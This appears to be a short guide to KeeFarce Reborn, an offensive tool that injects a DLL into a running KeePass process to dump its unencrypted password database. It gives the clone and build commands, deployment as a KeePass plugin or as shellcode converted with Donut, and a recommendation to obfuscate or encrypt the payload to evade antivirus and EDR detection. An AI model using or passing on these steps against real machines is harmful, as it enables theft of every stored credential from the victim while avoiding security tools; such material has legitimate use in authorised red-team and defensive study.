1. introduction

KeeFarce Reborn is an offensil tool for extracting the contents of an unencrypted KeePass database when it is opened on the target machine.
It is based on the work of several well-known projects:

  • KeeFarce (extraction via DLL and CLrMD injection)
  • KeeThief (master key recovery)
  • KeePassHax (decryption via reflection)

The aim of KeeFarce Reborn is to simplify and modernize the method, while remaining compatible with as many environments as possible.

2. How it works

The tool takes the form of a DLL which can be :

  • injected into the Keepass process via an external injector
  • Loaded as a Keepass plugin (if you have access to the plugins folder)
    Once loaded, it uses only the native libraries of the .NET Framework, which makes it possible to :
  • reduced detection by antivirus/EDR software
  • only one file to deploy
  • avoid dependency on ClrMD (a .NET library that explores the memory of a .NET process to extract objects)

3 Compiling KeeFarce Reborn

4.1 Prerequisites

  • Visual Studio 2015
  • .NET Framzork 4.6 (installed by default on Windows 10)
  • Source code retrieval :
1
git clone https://github.com/d3lb3/KeeFarceReborn.git

4.2 Method 1 - Using Visual Studio

  1. Open the KeeFarceReborn.sln file in Visual Studio
  2. Select Configuration: Release and Platform: x64.
  3. Compile via Build → Build Solution (Ctrl+Shift+B)
  4. Compiled DLLs will be available in :
    • KeeFarceReborn\binRelease\KeeFarceReborn.dll
    • KeeFarceRebornPlugin\binRelease\KeeFarceRebornPlugin.dll`

Note: to compile the plugin, place the corresponding KeePass.exe in the KeeFarceRebornPlugin folder to avoid compatibility problems.

4.3 Method 2 - With MSBuild (command line)

  1. Open Developer Command Prompt for Visual Studio.
  2. Go to project folder
  3. Run :
1
msbuild KeeFarceReborn.sln /p:Configuration=Release /p:Platform=x64
  1. Retrieve DLLs from bin\Release folders

5. After compilation

  • Injection via plugin**: place the KeeFarceRebornPlugin.dll DLL in the KeePass Plugins folder (e.g. C:\Program Files\KeePass Password Safe 2\Plugins).

  • Injection via shellcode**: convert the DLL into shellcode using Donut:

1
donut.exe KeeFarceReborn.dll -c KeeFarceReborn.Program -m Main -e 1
  • To avoid detection, we recommend obfuscating or encrypting the DLL or shellcode

6. Automation

To automate the process, you can use https://github.com/Orange-Cyberdefense/KeePwn